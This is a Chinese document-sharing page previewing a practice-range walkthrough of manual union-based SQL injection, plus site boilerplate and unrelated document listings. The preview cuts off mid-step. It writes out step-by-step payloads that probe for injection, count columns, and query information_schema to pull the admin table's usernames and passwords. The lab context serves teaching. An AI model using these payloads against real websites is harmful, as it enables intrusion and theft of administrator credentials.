已阅读5页,还剩4页未读, 继续免费阅读
版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
靶场位置:/?a=battle&f=target&id=485e58d0afa7e4f7第一步,判断是否存在sql注入漏洞构造 ?id=1 and 1=1 ,回车页面返回正常构造 ?id=1 and 1=2 ,回车页面不正常,初步判断这里 可能 存在一个注入漏洞第二步:判断字段数构造 ?id=1 and 1=1 order by 1 回车页面正常继续构造 ?id=1 and 1=1 order by 2 回车页面正常继续构造 ?id=1 and 1=1 order by 3 回车页面异常,因此判断当前页面所使用的的数据表里有2个字段第三步:判断回显点因为判断字段数为2,所以构造 ?id=1 and 1=2 union select 1,2 回车页面出现了 2 ,说明我们可以在数字 2 处显示我们想要的内容。第四步:查询相关内容查询当前数据库名构造 ?id=1 and 1=2 union select 1,database() 回车查询当前数据库版本构造 ?id=1 and 1=2 union select 1,version() 回车查询当前数据库有哪些表构造 ?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1 回车P.S:可通过修改红色处的数字来查询其他的表名,比如limit 1,1。这里我们想拿到的是目标的管理员账号密码,一般在admin表里,所以没有继续测试。查询admin表里有哪些字段构造?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=admin limit 0,1P.S:可通过修改红色处的数字来查询其他的字段名。查询到admin表里有三个字段,id ,username和password查询这些字段的内容构造?id=1 and 1=2 union select 1,username from admin limit 0,1 P.S:可通过修改红色处的数字来查询其他的内容。构造?id=1
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 中国稀土校招面试题及答案
- 施工乙方免责协议书
- 模具租赁支付协议书
- 临期产品协议书范本
- 交叉作业协议书范本
- 木工劳动合同协议书
- 校园商铺转租合同范本
- 楼房变更户主协议书
- 楼房买卖押金协议书
- 风险警示股协议书范本
- 译林版九年级上下册英语单词表(含音标)
- DB53∕T 1032-2021 公路隧道超前地质预报技术规程
- 新版食品安全管理HACCP体系V1.0内审检查表
- AutoCAD 中文版室内设计实例教程(AutoCAD 2020)课件 第1、2章 初识 AutoCAD 2020 中文版、绘图设置
- 互联网宗教信息服务审核员考试报名表
- 金庸小说赏析之射雕英雄传课件
- 慢性胃炎病人的护理课件
- 客车保养手册
- GB/T 8813-2020硬质泡沫塑料压缩性能的测定
- GB/T 20245.2-2013电化学分析器性能表示第2部分:pH值
- 真菌感染的高危因素
评论
0/150
提交评论